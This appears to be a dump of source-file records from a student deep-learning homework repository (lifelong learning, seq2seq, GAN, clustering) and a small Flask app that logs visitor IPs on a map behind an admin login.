"text": "import json\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef plot_result(mode_list, task1, task2, task3):\r\n # draw the lines\r\n count = 0\r\n for reg_name in mode_list:\r\n label = reg_name\r\n with open('./{reg_name}_acc.txt', 'r') as f:\r\n acc = json.load(f)\r\n if count == 0:\r\n color = 'red'\r\n elif count == 1:\r\n color = 'blue'\r\n else:\r\n color = 'purple'\r\n ax1 = plt.subplot(3, 1, 1)\r\n plt.plot(range(len(acc[task1])), acc[task1], color, label=label)\r\n ax1.set_ylabel(task1)\r\n ax2 = plt.subplot(3, 1, 2, sharex=ax1, sharey=ax1)\r\n plt.plot(range(len(acc[task3]), len(acc[task1])), acc[task2], color, label=label)\r\n ax2.set_ylabel(task2)\r\n ax3 = plt.subplot(3, 1, 3, sharex=ax1, sharey=ax1)\r\n ax3.set_ylabel(task3)\r\n plt.plot(range(len(acc[task2]), len(acc[task1])), acc[task3], color, label=label)\r\n count += 1\r\n plt.ylim((0.02, 1.02))\r\n plt.legend()\r\n plt.show()\r\n return\r\n\r\n\r\nmode_list = ['ewc', 'mas', 'basic']\r\nplot_result(mode_list, 'SVHN', 'MNIST', 'USPS')\r\n"
},
{
"alpha_fraction": 0.6598639488220215,
"alphanum_fraction": 0.6743764281272888,
"avg_line_length": 32.421875,
"blob_id": "4055f72eed29b0d50c974340693bb09cdc9c51c7",
"content_id": "c66d88742141a1213ed1958c4930de2993f48998",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2323,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 64,
"path": "/hw8_seq2seq/testing.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "from torch import nn\r\nfrom torch.utils import data\r\nfrom hw8_seq2seq.config import configurations\r\nfrom hw8_seq2seq.data import EN2CNDataset\r\nfrom hw8_seq2seq.main import device\r\nfrom hw8_seq2seq.utils import build_model, tokens2sentence, computebleu\r\n\r\n\r\ndef test(model, dataloader, loss_function):\r\n model.eval()\r\n loss_sum, bleu_score = 0.0, 0.0\r\n n = 0\r\n result = []\r\n for sources, targets in dataloader:\r\n sources, targets = sources.to(device), targets.to(device)\r\n batch_size = sources.size(0)\r\n outputs, preds = model.inference(sources, targets)\r\n # targets 的第一個 token 是 <BOS> 所以忽略\r\n outputs = outputs[:, 1:].reshape(-1, outputs.size(2))\r\n targets = targets[:, 1:].reshape(-1)\r\n\r\n loss = loss_function(outputs, targets)\r\n loss_sum += loss.item()\r\n\r\n # 將預測結果轉為文字\r\n targets = targets.view(sources.size(0), -1)\r\n preds = tokens2sentence(preds, dataloader.dataset.int2word_cn)\r\n sources = tokens2sentence(sources, dataloader.dataset.int2word_en)\r\n targets = tokens2sentence(targets, dataloader.dataset.int2word_cn)\r\n for source, pred, target in zip(sources, preds, targets):\r\n result.append((source, pred, target))\r\n # 計算 Bleu Score\r\n bleu_score += computebleu(preds, targets)\r\n\r\n n += batch_size\r\n\r\n return loss_sum / len(dataloader), bleu_score / n, result\r\n\r\n\r\ndef test_process(config):\r\n # 準備測試資料\r\n test_dataset = EN2CNDataset(config.data_path, config.max_output_len, 'testing')\r\n test_loader = data.DataLoader(test_dataset, batch_size=1)\r\n # 建構模型\r\n model, optimizer = build_model(config, test_dataset.en_vocab_size, test_dataset.cn_vocab_size)\r\n print (\"Finish build model\")\r\n loss_function = nn.CrossEntropyLoss(ignore_index=0)\r\n model.eval()\r\n # 測試模型\r\n test_loss, bleu_score, result = test(model, test_loader, loss_function)\r\n # 儲存結果\r\n with open('./test_output.txt', 'w') as f:\r\n for line in result:\r\n print (line, file=f)\r\n\r\n return test_loss, bleu_score\r\n\r\n\r\n# 在執行 Test 之前,請先行至 config 設定所要載入的模型位置\r\nif __name__ == '__main__':\r\n config = configurations()\r\n print('config:\\n', vars(config))\r\n test_loss, bleu_score = test_process(config)\r\n print('test loss: {test_loss}, bleu_score: {bleu_score}')\r\n\r\n"
},
{
"alpha_fraction": 0.6232044100761414,
"alphanum_fraction": 0.6453038454055786,
"avg_line_length": 32.80769348144531,
"blob_id": "94790a5216a686b3401043240a745d5c3172baf2",
"content_id": "83595bd7ecc573f5ebdaf7bb6996d520ec792fb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 905,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 26,
"path": "/hw11_GAN/inference.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import os\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torchvision\r\nfrom torch.autograd import Variable\r\nfrom hw11.hw11GAN import Generator, z_dim, workspace_dir\r\n\r\nif __name__ == '__main__':\r\n '''inference'''\r\n # load pretrained model\r\n G = Generator(z_dim)\r\n G.load_state_dict(torch.load(os.path.join(workspace_dir, 'dcgan_g.pth')))\r\n G.eval()\r\n G.cuda()\r\n # generate images and save the result\r\n n_output = 20\r\n z_sample = Variable(torch.randn(n_output, z_dim))\r\n imgs_sample = (G(z_sample).data + 1) / 2.0\r\n save_dir = os.path.join(workspace_dir, 'logs')\r\n filename = os.path.join(save_dir, 'result.jpg')\r\n torchvision.utils.save_image(imgs_sample, filename, nrow=10)\r\n # show image\r\n grid_img = torchvision.utils.make_grid(imgs_sample.cpu(), nrow=10)\r\n plt.figure(figsize=(10, 10))\r\n plt.imshow(grid_img.permute(1, 2, 0))\r\n plt.show()\r\n"
},
{
"alpha_fraction": 0.5063542723655701,
"alphanum_fraction": 0.5170770287513733,
"avg_line_length": 38.6129035949707,
"blob_id": "e1957fc89a7e107ab5fd93f9da3b8269695eb979",
"content_id": "7a5f6e7293a1bba196a34168a5380fa5394e0c14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2615,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 62,
"path": "/hw14_life_long_learning/MAS.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Memory Aware Synapses\r\nimport torch\r\nfrom torch import nn\r\n\r\n\r\nclass MAS(object):\r\n \"\"\"\r\n @article{aljundi2017memory,\r\n title={Memory Aware Synapses: Learning what (not) to forget},\r\n author={Aljundi, Rahaf and Babiloni, Francesca and Elhoseiny, Mohamed and Rohrbach, Marcus and Tuytelaars, Tinne},\r\n booktitle={ECCV},\r\n year={2018},\r\n url={https://eccv2018.org/openaccess/content_ECCV_2018/papers/Rahaf_Aljundi_Memory_Aware_Synapses_ECCV_2018_paper.pdf}\r\n }\r\n \"\"\"\r\n\r\n def __init__(self, model: nn.Module, dataloaders: list, device):\r\n self.model = model\r\n self.dataloaders = dataloaders\r\n self.params = {n: p for n, p in self.model.named_parameters() if p.requires_grad} # 抓出模型的所有參數\r\n self._means = {} # 初始化 平均參數\r\n self.device = device\r\n self._precision_matrices = self.calculate_importance() # 產生 MAS 的 Omega(Ω) 矩陣\r\n\r\n for n, p in self.params.items():\r\n self._means[n] = p.clone().detach()\r\n\r\n def calculate_importance(self):\r\n print('Computing MAS')\r\n\r\n precision_matrices = {}\r\n for n, p in self.params.items():\r\n precision_matrices[n] = p.clone().detach().fill_(0) # 初始化 Omega(Ω) 矩陣(都補零)\r\n\r\n self.model.eval()\r\n dataloader_num = len(self.dataloaders)\r\n num_data = sum([len(loader) for loader in self.dataloaders])\r\n for dataloader in self.dataloaders:\r\n for data in dataloader:\r\n self.model.zero_grad()\r\n output = self.model(data[0].to(self.device))\r\n\r\n #######################################################################################\r\n ##### 產生 MAS 的 Omega(Ω) 矩陣 ( 對 output 向量 算他的 l2 norm 的平方) 再取 gradient #####\r\n #######################################################################################\r\n output.pow_(2)\r\n loss = torch.sum(output, dim=1)\r\n loss = loss.mean()\r\n loss.backward()\r\n\r\n for n, p in self.model.named_parameters():\r\n precision_matrices[n].data += p.grad.abs() / num_data ## difference with EWC\r\n\r\n precision_matrices = {n: p for n, p in precision_matrices.items()}\r\n return precision_matrices\r\n\r\n def penalty(self, model: nn.Module):\r\n loss = 0\r\n for n, p in model.named_parameters():\r\n _loss = self._precision_matrices[n] * (p - self._means[n]) ** 2\r\n loss += _loss.sum()\r\n return loss\r\n"
},
{
"alpha_fraction": 0.6476476192474365,
"alphanum_fraction": 0.6686686873435974,
"avg_line_length": 30.225807189941406,
"blob_id": "d5acacf4a0ce9c2f9883ef82512b012be3e3c54c",
"content_id": "c5e883eaf66e1eaebdd0a1f78d4f2e3d4bf1dc53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1063,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 31,
"path": "/hw4RNN/w2v.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# w2v.py\r\n# 這個block是用來訓練word to vector 的 word embedding\r\n# 注意!這個block在訓練word to vector時是用cpu,可能要花到10分鐘以上\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport argparse\r\nfrom gensim.models import word2vec\r\nfrom hw4RNN.utils import load_training_data, load_testing_data\r\n\r\n\r\ndef train_word2vec(x):\r\n # 訓練word to vector 的 word embedding\r\n model = word2vec.Word2Vec(x, size=250, window=5, min_count=5, workers=12, iter=10, sg=1)\r\n return model\r\n\r\n\r\nif __name__ == \"__main__\":\r\n path_prefix = './'\r\n print(\"loading training data ...\")\r\n train_x, y = load_training_data('training_label.txt')\r\n train_x_no_label = load_training_data('training_nolabel.txt')\r\n\r\n print(\"loading testing data ...\")\r\n test_x = load_testing_data('testing_data.txt')\r\n\r\n model = train_word2vec(train_x + train_x_no_label + test_x)\r\n\r\n print(\"saving model ...\")\r\n # model.save(os.path.join(path_prefix, 'model/w2v_all.model'))\r\n model.save(os.path.join(path_prefix, 'w2v_all.model'))\r\n"
},
{
"alpha_fraction": 0.5784753561019897,
"alphanum_fraction": 0.5818385481834412,
"avg_line_length": 35.16666793823242,
"blob_id": "3d03991432ba97e29bdf8c36a246f5d44ea94121",
"content_id": "56476090c4c6fc00f9e4eae3d377e9ac17aab22c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 968,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 24,
"path": "/hw9_unsupervised/problem1.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport torch\r\nfrom hw9.clustering import inference, predict, cal_acc, plot_scatter\r\nfrom hw9.unsupervised import AE\r\n\r\n# 將 val data 的降維結果 (embedding) 與他們對應的 label 畫出來。\r\n\r\nif __name__ == '__main__':\r\n valX = np.load('./valX.npy')\r\n valY = np.load('./valY.npy')\r\n\r\n # ==============================================\r\n # 我們示範 basline model 的作圖,\r\n # report 請同學另外還要再畫一張 improved model 的圖。\r\n # ==============================================\r\n model = AE()\r\n model.load_state_dict(torch.load('./checkpoints/last_checkpoint.pth'))\r\n model.eval()\r\n latents = inference(valX, model)\r\n pred_from_latent, emb_from_latent = predict(latents)\r\n acc_latent = cal_acc(valY, pred_from_latent)\r\n print('The clustering accuracy is:', acc_latent)\r\n print('The clustering result:')\r\n plot_scatter(emb_from_latent, valY, savefig='p1_baseline.png')\r\n"
},
{
"alpha_fraction": 0.6977611780166626,
"alphanum_fraction": 0.7014925479888916,
"avg_line_length": 30.484848022460938,
"blob_id": "0ade5a8fba40bbf3484ed0bf918dc1e4b6d216c3",
"content_id": "a2647012682951f461ca4bef13c7eb28498f4f0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1072,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/hw14_life_long_learning/utils.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import torch\r\nfrom hw14_life_long_learning.data import Data, Dataloader\r\nfrom hw14_life_long_learning.model import Model\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n\r\n\r\ndef save_model(model, optimizer, store_model_path):\r\n # save model and optimizer\r\n torch.save(model.state_dict(), '{store_model_path}.ckpt')\r\n torch.save(optimizer.state_dict(), '{store_model_path}.opt')\r\n return\r\n\r\n\r\ndef load_model(model, optimizer, load_model_path):\r\n # load model and optimizer\r\n print('Load model from {load_model_path}')\r\n model.load_state_dict(torch.load('{load_model_path}.ckpt'))\r\n optimizer.load_state_dict(torch.load('{load_model_path}.opt'))\r\n return model, optimizer\r\n\r\n\r\ndef build_model(data_path, batch_size, learning_rate):\r\n # create model\r\n model = Model().to(device)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\r\n data = Data(data_path)\r\n datasets = data.get_datasets()\r\n tasks = []\r\n for dataset in datasets:\r\n tasks.append(Dataloader(dataset, batch_size))\r\n\r\n return model, optimizer, tasks\r\n"
},
{
"alpha_fraction": 0.551898717880249,
"alphanum_fraction": 0.6050633192062378,
"avg_line_length": 28.230770111083984,
"blob_id": "463f23ce087a8af05020d6dd37471e725bebfa17",
"content_id": "196baae643d79c3d17212d3d31d92090545d607e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 395,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 13,
"path": "/hw14_life_long_learning/config.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "\r\nclass configurations(object):\r\n def __init__(self):\r\n self.batch_size = 256\r\n self.num_epochs = 10000\r\n self.store_epochs = 250\r\n self.summary_epochs = 250\r\n self.learning_rate = 0.0005\r\n self.load_model = False\r\n self.store_model_path = \"./model\"\r\n self.load_model_path = \"./model\"\r\n self.data_path = \"./data\"\r\n self.mode = None\r\n self.lifelong_coeff = 0.5\r\n"
},
{
"alpha_fraction": 0.5075757503509521,
"alphanum_fraction": 0.5181818008422852,
"avg_line_length": 41.278690338134766,
"blob_id": "b89fac990b3174841f701ad6a36b2a78961c160a",
"content_id": "39d673ed81eec3b5b66d38d6788ccbd936a69872",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2760,
"license_type": "no_license",
"max_line_length": 195,
"num_lines": 61,
"path": "/hw14_life_long_learning/EWC.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Elastic Weight Consolidation\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nclass EWC(object):\r\n \"\"\"\r\n @article{kirkpatrick2017overcoming,\r\n title={Overcoming catastrophic forgetting in neural networks},\r\n author={Kirkpatrick, James and Pascanu, Razvan and Rabinowitz, Neil and Veness, Joel and Desjardins, Guillaume and Rusu, Andrei A and Milan, Kieran and Quan, John and Ramalho, Tiago and Grabska-Barwinska, Agnieszka and others},\r\n journal={Proceedings of the national academy of sciences},\r\n year={2017},\r\n url={https://arxiv.org/abs/1612.00796}\r\n }\r\n \"\"\"\r\n\r\n def __init__(self, model: nn.Module, dataloaders: list, device):\r\n\r\n self.model = model\r\n self.dataloaders = dataloaders\r\n self.device = device\r\n\r\n self.params = {n: p for n, p in self.model.named_parameters() if p.requires_grad} # 抓出模型的所有參數\r\n self._means = {} # 初始化 平均參數\r\n self._precision_matrices = self._calculate_importance() # 產生 EWC 的 Fisher (F) 矩陣\r\n\r\n for n, p in self.params.items():\r\n self._means[n] = p.clone().detach() # 算出每個參數的平均 (用之前任務的資料去算平均)\r\n\r\n def _calculate_importance(self):\r\n precision_matrices = {}\r\n for n, p in self.params.items(): # 初始化 Fisher (F) 的矩陣(都補零)\r\n precision_matrices[n] = p.clone().detach().fill_(0)\r\n\r\n self.model.eval()\r\n dataloader_num = len(self.dataloaders)\r\n number_data = sum([len(loader) for loader in self.dataloaders])\r\n for dataloader in self.dataloaders:\r\n for data in dataloader:\r\n self.model.zero_grad()\r\n input = data[0].to(self.device)\r\n output = self.model(input).view(1, -1)\r\n label = output.max(1)[1].view(-1)\r\n\r\n ############################################################################\r\n ##### 產生 EWC 的 Fisher(F) 矩陣 #####\r\n ############################################################################\r\n loss = F.nll_loss(F.log_softmax(output, dim=1), label)\r\n loss.backward()\r\n\r\n for n, p in self.model.named_parameters():\r\n precision_matrices[n].data += p.grad.data ** 2 / number_data\r\n\r\n precision_matrices = {n: p for n, p in precision_matrices.items()}\r\n return precision_matrices\r\n\r\n def penalty(self, model: nn.Module):\r\n loss = 0\r\n for n, p in model.named_parameters():\r\n _loss = self._precision_matrices[n] * (p - self._means[n]) ** 2\r\n loss += _loss.sum()\r\n return loss\r\n"
},
{
"alpha_fraction": 0.4382352828979492,
"alphanum_fraction": 0.5220588445663452,
"avg_line_length": 20.66666603088379,
"blob_id": "c11e98186ec69e7e64661c7433b77d1ae596cc6c",
"content_id": "4744e0e6d308bba4411eb84d422a4a275185795f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 680,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 30,
"path": "/hw14_life_long_learning/model.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# Basic Model\r\nfrom torch import nn\r\n\r\n\r\nclass Model(nn.Module):\r\n\r\n def __init__(self):\r\n super(Model, self).__init__()\r\n self.fc1 = nn.Linear(3*32*32, 1024)\r\n self.fc2 = nn.Linear(1024, 512)\r\n self.fc3 = nn.Linear(512, 256)\r\n self.fc4 = nn.Linear(256, 128)\r\n self.fc5 = nn.Linear(128, 128)\r\n self.fc6 = nn.Linear(128, 10)\r\n self.relu = nn.ReLU()\r\n\r\n def forward(self, x):\r\n x = x.view(-1, 3*32*32)\r\n x = self.fc1(x)\r\n x = self.relu(x)\r\n x = self.fc2(x)\r\n x = self.relu(x)\r\n x = self.fc3(x)\r\n x = self.relu(x)\r\n x = self.fc4(x)\r\n x = self.relu(x)\r\n x = self.fc5(x)\r\n x = self.relu(x)\r\n x = self.fc6(x)\r\n return x\r\n"
},
{
"alpha_fraction": 0.5045170187950134,
"alphanum_fraction": 0.5357887148857117,
"avg_line_length": 30.704545974731445,
"blob_id": "dc820418a62785f0206f1444e81d646c6b2c344a",
"content_id": "4021c5cce9b14e22ded36746fed661776367c1c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1487,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 44,
"path": "/hw14_life_long_learning/preprocess.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "# 資料預處理\r\n# 轉換 MNIST ( 1∗28∗28 ) 到 ( 3∗32∗32 )\r\n# 轉換 USPS ( 1∗16∗16 ) 到 ( 3∗32∗32 )\r\n# 正規化 圖片\r\nimport torch\r\nfrom torchvision import transforms\r\n\r\n\r\nclass Convert2RGB(object):\r\n\r\n def __init__(self, num_channel):\r\n self.num_channel = num_channel\r\n\r\n def __call__(self, img):\r\n # If the channel of img is not equal to desired size,\r\n # then expand the channel of img to desired size.\r\n img_channel = img.size()[0]\r\n img = torch.cat([img] * (self.num_channel - img_channel + 1), 0)\r\n return img\r\n\r\n\r\nclass Pad(object):\r\n\r\n def __init__(self, size, fill=0, padding_mode='constant'):\r\n self.size = size\r\n self.fill = fill\r\n self.padding_mode = padding_mode\r\n\r\n def __call__(self, img):\r\n # If the H and W of img is not equal to desired size,\r\n # then pad the channel of img to desired size.\r\n img_size = img.size()[1]\r\n assert ((self.size - img_size) % 2 == 0)\r\n padding = (self.size - img_size) // 2\r\n padding = (padding, padding, padding, padding)\r\n return F.pad(img, padding, self.padding_mode, self.fill)\r\n\r\n\r\ndef get_transform():\r\n transform = transforms.Compose([transforms.ToTensor(),\r\n Pad(32),\r\n Convert2RGB(3),\r\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])])\r\n return transform\r\n"
},
{
"alpha_fraction": 0.6163229942321777,
"alphanum_fraction": 0.6291025280952454,
"avg_line_length": 28.723215103149414,
"blob_id": "64a726617ef931cd652a9ae61064c0ea05195183",
"content_id": "3e6d5b3fb3e1c980c726cf1bc79e93b1021f0155",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3785,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 112,
"path": "/hw9_unsupervised/clustering.py",
"repo_name": "stronglily/lhy",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nfrom sklearn.decomposition import KernelPCA\r\nfrom sklearn.manifold import TSNE\r\nfrom sklearn.cluster import MiniBatchKMeans\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom hw9.unsupervised import preprocess, Image_Dataset, AE\r\n\r\n\r\ndef cal_acc(gt, pred):\r\n \"\"\" Computes categorization accuracy of our task.\r\n Args:\r\n gt: Ground truth labels (9000, )\r\n pred: Predicted labels (9000, )\r\n Returns:\r\n acc: Accuracy (0~1 scalar)\r\n \"\"\"\r\n # Calculate Correct predictions\r\n correct = np.sum(gt == pred)\r\n acc = correct / gt.shape[0]\r\n # 因為是 binary unsupervised clustering,因此取 max(acc, 1-acc)\r\n return max(acc, 1-acc)\r\n\r\n\r\ndef plot_scatter(feat, label, savefig=None):\r\n \"\"\" Plot Scatter Image.\r\n Args:\r\n feat: the (x, y) coordinate of clustering result, shape: (9000, 2)\r\n label: ground truth label of image (0/1), shape: (9000,)\r\n Returns:\r\n None\r\n \"\"\"\r\n X = feat[:, 0]\r\n Y = feat[:, 1]\r\n plt.scatter(X, Y, c = label)\r\n plt.legend(loc='best')\r\n if savefig is not None:\r\n plt.savefig(savefig)\r\n plt.show()\r\n return\r\n\r\n\r\n\"\"\"\r\n接著我們使用訓練好的 model,來預測 testing data 的類別。\r\n由於 testing data 與 training data 一樣,因此我們使用同樣的 dataset 來實作 dataloader。\r\n與 training 不同的地方在於 shuffle 這個參數值在這邊是 False。\r\n準備好 model 與 dataloader,我們就可以進行預測了。\r\n我們只需要 encoder 的結果(latents),利用 latents 進行 clustering 之後,就可以分類了。\r\n\"\"\"\r\ndef inference(X, model, batch_size=8):\r\n X = preprocess(X)\r\n dataset = Image_Dataset(X)\r\n dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False)\r\n latents = []\r\n for i, x in enumerate(dataloader):\r\n x = torch.FloatTensor(x)\r\n vec, img = model(x.cuda())\r\n if i == 0:\r\n latents = vec.view(img.size()[0], -1).cpu().detach().numpy()\r\n else:\r\n latents = np.concatenate((latents, vec.view(img.size()[0], -1).cpu().detach().numpy()), axis = 0)\r\n print('Latents Shape:', latents.shape)\r\n return latents\r\n\r\ndef predict(latents):\r\n # First Dimension Reduction\r\n transformer = KernelPCA(n_components=200, kernel='rbf', n_jobs=-1)\r\n kpca = transformer.fit_transform(latents)\r\n print('First Reduction Shape:', kpca.shape)\r\n\r\n # # Second Dimesnion Reduction\r\n X_embedded = TSNE(n_components=2).fit_transform(kpca)\r\n print('Second Reduction Shape:', X_embedded.shape)\r\n\r\n # Clustering\r\n pred = MiniBatchKMeans(n_clusters=2, random_state=0).fit(X_embedded)\r\n pred = [int(i) for i in pred.labels_]\r\n pred = np.array(pred)\r\n return pred, X_embedded\r\n\r\ndef invert(pred):\r\n return np.abs(1-pred)\r\n\r\ndef save_prediction(pred, out_csv='prediction.csv'):\r\n with open(out_csv, 'w') as f:\r\n f.write('id, label\\n')\r\n for i, p in enumerate(pred):\r\n f.write('{i},{p}\\n')\r\n print('Save prediction to {out_csv}.')\r\n\r\n\r\nif __name__ == '__main__':\r\n # load model\r\n model = AE()\r\n model.load_state_dict(torch.load('./checkpoints/last_checkpoint.pth'))\r\n model.eval()\r\n\r\n # 準備 data\r\n trainX = np.load('./trainX_new.npy')\r\n\r\n # 預測答案\r\n latents = inference(X=trainX, model=model)\r\n pred, X_embedded = predict(latents)\r\n\r\n # 將預測結果存檔,上傳 kaggle\r\n save_prediction(pred, 'prediction.csv')\r\n\r\n # 由於是 unsupervised 的二分類問題,我們只在乎有沒有成功將圖片分成兩群\r\n # 如果上面的檔案上傳 kaggle 後正確率不足 0.5,只要將 label 反過來就行了\r\n save_prediction(invert(pred), 'prediction_invert.csv')\r\n\r\n"
}
] | 27 |
abhijeet-001/flask_app
|
https://github.com/abhijeet-001/flask_app
|
862ed39958b23d522b22dcb7d6e710872c42cd7f
|
64f17288355c968c81cee8c2db345c2aafd59da9
|
deb8bead1c2a52260ca4f48494e5a9a3096f3f42
|
refs/heads/master
| 2020-12-12T08:41:09.279874 | 2020-01-16T04:23:41 | 2020-01-16T04:23:41 | 234,092,087 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6264028549194336,
"alphanum_fraction": 0.6399881839752197,
"avg_line_length": 33.56122589111328,
"blob_id": "c0f56d4070fbe4344d78c8febf55a8a6e798a3b1",
"content_id": "de560a712ca30ed74703cf513d97e1209be5a9b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3386,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 98,
"path": "/views.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "from main import app, db\nfrom flask import render_template, request, url_for, redirect, flash\nfrom models import Request, Admin\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom forms import LoginForm, ResetPasswordForm\nfrom flask_login import login_user, current_user, logout_user, login_required\nimport ipinfo\nfrom flask_googlemaps import Map\n\n# Defines Home Page\[email protected](\"/\")\ndef index():\n if request.headers.getlist(\"X-Forwarded-For\"):\n user_ip = request.headers.getlist(\"X-Forwarded-For\")[0]\n else:\n user_ip = request.remote_addr\n # user_ip = getrequest.remote_addr\n req = Request(ip_address=user_ip)\n db.session.add(req)\n db.session.commit()\n return render_template('home.html')\n\n# 404 error page\[email protected](404)\ndef not_found(error):\n return render_template('404.html', error=error)\n\n# Admin Login Page\[email protected]('/admin/login/', methods=['GET', 'POST'])\ndef admin_login():\n if current_user.is_authenticated:\n return redirect(url_for('admin_dashboard'))\n form = LoginForm()\n if form.validate_on_submit():\n admin = Admin.query.filter_by(email=form.email.data).first()\n if admin is not None:\n if check_password_hash(admin.password, form.password.data):\n login_user(admin)\n if admin.is_fresh_login is True:\n admin.is_fresh_login = False\n db.session.commit()\n return redirect(url_for('admin_reset_password'))\n else:\n return redirect(url_for('admin_dashboard'))\n else:\n flash(u\"Invalid credentails.\", \"danger\") \n else:\n flash(u\"Invalid credentails.\", \"danger\")\n return render_template('admin/login.html', form=form)\n\n# Admin dashboard\[email protected]('/admin/')\n@login_required\ndef admin_dashboard():\n ip_markers = []\n # get all request ip\n requests = Request.query.all()\n if requests is not None:\n for req in requests:\n location = get_loc_by_ip(req.ip_address)\n if location is not None:\n ip_markers.append(location)\n\n map = Map(\"admin-google-map\",lat=17.685895,lng=77.158687, zoom=3,markers=ip_markers)\n else:\n map = Map(\"admin-google-map\",lat=17.685895,lng=77.158687, zoom=3)\n return render_template('admin/dashboard.html', map=map)\n\n# Password Reset if admin loggins for first time\[email protected]('/admin/reset-password', methods=['GET', 'POST'])\n@login_required\ndef admin_reset_password():\n form = ResetPasswordForm()\n if form.validate_on_submit():\n admin_id = current_user.id\n admin = Admin.query.get(int(admin_id))\n admin.password = generate_password_hash(form.password.data)\n admin.is_pw_changed = True\n db.session.commit()\n return redirect(url_for('admin_dashboard'))\n return render_template('admin/reset_password.html', form=form)\n\n# Logout View\[email protected]('/admin/logout')\ndef admin_logout():\n logout_user()\n return redirect(url_for('admin_login'))\n\n\ndef get_loc_by_ip(ip):\n handler = ipinfo.getHandler(app.config['IPINFO_TOKEN'])\n data = handler.getDetails(ip)\n if data is not None:\n location = data.loc.split(\",\")\n marker = { \"lat\": float(location[0]), \"lng\": float(location[1]), \"infobox\": ip }\n return marker\n else:\n return None"
},
{
"alpha_fraction": 0.7084941864013672,
"alphanum_fraction": 0.7104247212409973,
"avg_line_length": 20.58333396911621,
"blob_id": "beb1f24ff8bf4b1ef8f2364717f36cb9ec28c34c",
"content_id": "ec8ea3f8303c77049295310f489a7e4f542bcf7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 24,
"path": "/settings.py",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
"text": "# Secret Key\nSECRET_KEY = \"YOUR_SECRET_KEY\"\n\n# Defines App's mode \n# True or False\nDEBUG = False\n\n# Database Credentials\nDB_USER = \"YOUR_DB_USER\"\nDB_PASSWORD = \"YOUR_DB_PASSWORD\"\nHOST = \"YOUR_DB_HOST\"\nDB_NAME = \"YOUR_DB_NAME\"\n\n# SQLAlchemy Database URL\nSQLALCHEMY_DATABASE_URI = \"postgresql+psycopg2://\"+DB_USER+\":\"+DB_PASSWORD+\"@\"+HOST+\"/\"+DB_NAME\n\n# Set Warning to False\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n# Google Map API Key\nGOOGLEMAPS_KEY = 'YOUR_GOOGLEMAPS_KEY'\n\n# Ipinfo Token\nIPINFO_TOKEN = 'YOUR_IPINFO_TOKEN'\n"
},
{
"alpha_fraction": 0.4868154227733612,
"alphanum_fraction": 0.6977687478065491,
"avg_line_length": 16,
"blob_id": "65051311722149f148642c22e01a6a0a7bac36e1",
"content_id": "24ac48695c328aeff97ac259e7e0f5f4a7356428",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 493,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 29,
"path": "/requirements.txt",
"repo_name": "abhijeet-001/flask_app",
"src_encoding": "UTF-8",
